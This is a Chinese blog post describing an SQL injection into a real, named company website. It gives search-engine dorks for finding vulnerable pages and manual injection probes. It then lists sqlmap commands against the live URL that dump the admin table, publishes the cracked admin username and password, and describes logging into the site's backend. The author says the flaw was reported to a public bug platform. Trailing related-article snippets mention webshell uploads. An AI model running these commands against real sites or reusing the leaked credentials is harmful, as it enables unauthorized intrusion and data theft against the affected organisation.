实战真实网站的SQL注入

已于 2022-12-24 19:05:06 修改
阅读量6.9k 收藏 97
点赞数 16
文章标签: sql 网络安全
于 2022-12-24 18:57:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55376995/article/details/128429584
版权

提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档

前言

某建设投资集团股份有限公司网站存在SQL注入

一、发现过程

1.使用百度语法寻找可能存在SQL注入的网站:

inurl:?id=1

inurl:asp?id=1

inurl:php?id=1

2.发现一个网站进去看看

3.尝试手工注入:

?id=1106'

?id=1106-1

?id=1106-2

 4.发现页面发生变化,可能存在SQL注入

二、漏洞利用

1.这里使用sqlmap进行注入
sqlmap -u www.hpcgc.com/nswsinfo.asp?id=1106-2 --tables
检测表:

2.sqlmap -u www.hpcgc.com/nswsinfo.asp?id=1106-2 -T admin --columns
检测字段:

3.sqlmap -u www.hpcgc.com/nswsinfo.asp?id=1106-2 -T admin -C password --dump
检测数据:

4.然后跑出用户名和密码,但密码是加密过的,我用MD5解密最后得出

用户名:admin

密码:20102010

  

5.最后用御剑扫描网站目录,扫出了网站后台,我尝试用刚刚跑出来的用户名和密码登录,没想到成功进去了,拿下此网站 

总结

1.最后我也是交到漏洞盒子“公益SRC”了

SQL注入的危险,当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。
这种网站内部直接发送的Sql请求一般不会有危险,但实际情况是很多时候需要结合用户的输入数据动态构造 Sql 语句,如果用户输入的数据被构造成恶意 Sql 代码,Web 应用又未对动态构造的 Sql 语句使用的参数进行审查,则会带来意想不到的危险。

Sql 注入带来的威胁主要有如下几点

  • 猜解后台数据库,这是利用最多的方式,盗取网站的敏感信息。
  • 绕过认证,列如绕过验证登录网站后台。
  • 注入可以借助数据库的存储过程进行提权等操作

 最后感谢大家的阅读观看,祝各位工作顺利,生活愉快,谢谢!

ctf{ashore}
关注
3-1SQL注入网站实例:注入步骤
小王的储物间
03-20 1754
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。同时每个成长路线对应的板块都有配套的视频提供:当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。
一次对真实网站SQL注入———SQLmap使用
aijuzhou1959的博客
07-16 330
网上有许多手工注入SQL的例子和语句,非常值得我们学习,手工注入能让我们更加理解网站和数据库的关系,也能明白为什么利用注入语句能发现网站漏洞。 因为我是新手,注入语句还不太熟悉,我这次是手注发现的注点,然后利用SQLmap实现注入,获得管理员账户密码。 网站:http://www.xxxxxx.com/info.php 当我们利用?id=1或者?id=2时,网站介绍部分发生了变...
sqli-labs漏洞靶场~SQL注入(全网最全详解)
weixin_67832625的博客
08-11 1524
本文主要对sqli-labs靶场的过程及思路做了最清晰的讲解,因为网上都是一些零散教程,今天笔者主打真实,写一篇通俗易懂的文章供大家参考!!!
SQL注入测试平台 SQLol -2.SELECT注入测试
05-23 347
前面,我们已经安装好了SQLol,打开http://localhost/sql/,首先跳转到http://localhost/sql/select.php,我们先从select模块进行测试。 一条完成Select语句,大致可以这样表示: SELECT 【username】 FROM 【users】 WHERE username = 【'1'】 GROUP BY 【u...
SQL注入入侵动网站(MSSQL)
weixin_34138056的博客
01-26 236
编辑前言:   这个文章我没有测试,但前提条件还是很多,比如一定要有别的程序存在,而且也要用同一个sqlserver库,还得假设有注入漏洞。说到底和动网没有什么关系,但因为动网论坛的开放性,让人熟悉了其数据库结构,和程序运作方法。在一步步的攻击中取得管理权限,再一步步的提升权限,如果正好数据库用的是sa帐号,就更是麻烦了。   正是由于这些条件的假设,所以大家也不用太紧张,这里提供的是很多...
本地网站 练习sql注入使用 新手必备
11-13
本地网站 用于练习sql注入使用 新手必备 本地网站 用于练习sql注入使用 新手必备
网站SQL注入
野生码农
01-24 2170
JSP注入攻击tomcat服务器小案例 https://blog.csdn.net/u012881836/article/details/51242641   原理 上传一个可以执行的jsp文件,然后打开这个文件。这个文件里,可以写一些代码,执行一些特殊操作。       jsp mysql 注入攻击实例 https://blog.csdn.net/judyge/article/...
sql注入 练手网站_简单SQL注入的手工测试
weixin_32364911的博客
02-04 1365
练习基础模块41、判断闭合字符和列数正常显示内容双引号闭合 " 显示正常页面这个就不是闭合字符双引号和单引号闭合 "' 显示报错页面这个就不是闭合字符由图片来开还有括号的存在 )尝试闭合字符 -- - 成功接下来获取表的列数order by 5 -- -这个报错说明 数据表的列数为42、获取数据的数据回显点和数据获取数据在第二行的地方可以查询回显数据数据库查询 leettime_761wHole查...
YXcms-含有SQL注入漏洞的源码包.zip
03-17
【标题】"YXcms-含有SQL注入漏洞的源码包.zip" 提供了一个关键的安全问题,即SQL注入漏洞,这是许多网站和应用程序面临的一种常见威胁。SQL注入是指攻击者通过在输入字段中插入恶意SQL代码,以获取、修改、删除...
sql注入#sql靶场
11-02
8. **SQL靶场实战**:在SQL靶场环境中,可以模拟真实的注入攻击,练习识别漏洞、构造注入语句,以及学习如何防御。靶场提供了各种场景,帮助用户熟悉不同类型的注入技术和防御策略。 9. **持续学习与更新**:SQL...
sql注入最新经典教学包
10-31
6. **sql教学文档**:这些文档将提供关于SQL语言的基础知识,以及关于SQL注入的理论和实战技巧。它们会讲解如何编写安全的SQL查询,避免SQL注入,并教你如何防御这种攻击。 学习这个教学包,你将能深入了解SQL注入...
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
寻找sql注入网站的方法(必看)
09-09
下面小编就为大家带来一篇寻找sql注入网站的方法(必看)。小编觉得挺不错的,现在就分享给大家,也给大家做个参考。一起跟随小编过来看看吧
信安必备靶场-sqli-labs-master-用于练习sql注入各种注入类型
最新发布
08-12
sqli-labs-master是一个SQL注入SQL Injection,简称Sqli)实战靶场的资源。这个靶场通常用于安全培训、渗透测试和学习Web应用程序安全方面的人员,它提供了一系列的模拟环境和挑战,目的是让用户通过实际操作来...
SQL注入-Oracle手工+sqlmap
xiaoheizi的博客
06-28 1293
-dump -T "" -D "" -C "" #列出指定数据库的表的字段的数据(--dump -T 表 -D 数据库 -C 列)sqlmap.py -r C:\Users\hesy\Desktop\1.txt --current-db//跑出数据库名字。--columns -T "user" -D "mysql" #列出mysql数据库中的user表的所有字段。--privileges #查看用户权限(--privileges -U root)sqlmap 数据库注入数据猜解。
sql注入 练手网站_记一次sql注入练习
weixin_39714835的博客
12-23 1074
做这个练习之前,感觉自己就是个小白,做了之后,感觉学到了好多东西。作文以记之。题目要求题目源于一个比赛,要求找出数据库中的flag字段的值。给的题目环境是一个新闻搜索引擎。界面界面开始渗透哈集美马修~1.sql注入检测,试探该网站有没有sql注入漏洞。首先猜测sql执行语句为:select [字段1,字段2...字段n] from [表名] where [内容字段] like '%关键词%' [....
SQL注入网址
duxingxia356的专栏
12-03 1082
http://www.freebuf.com/articles/web/38315.html http://www.freebuf.com/articles/web/38924.html http://www.freebuf.com/articles/web/34619.html http://websec.ca/kb/sql_injection http://drops.wo
360代码卫士_「经验总结」SQL注入Bypass安全狗360主机卫士
weixin_39880479的博客
11-26 567
0x00 前言这类的文章已经是比较多了,本文也主要是作为学习笔记来记录,主要是记录一下我在学习 SQL 注入 Bypass 的过程,同时前人的不少绕过方法已经失效了,所以这里也是记录一下最新规则的一些绕过方法。0x01 环境搭建测试环境:Win7 + Apache + MySQL 5.7.26 + PHP 5.5.45测试代码:...
评论 9
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值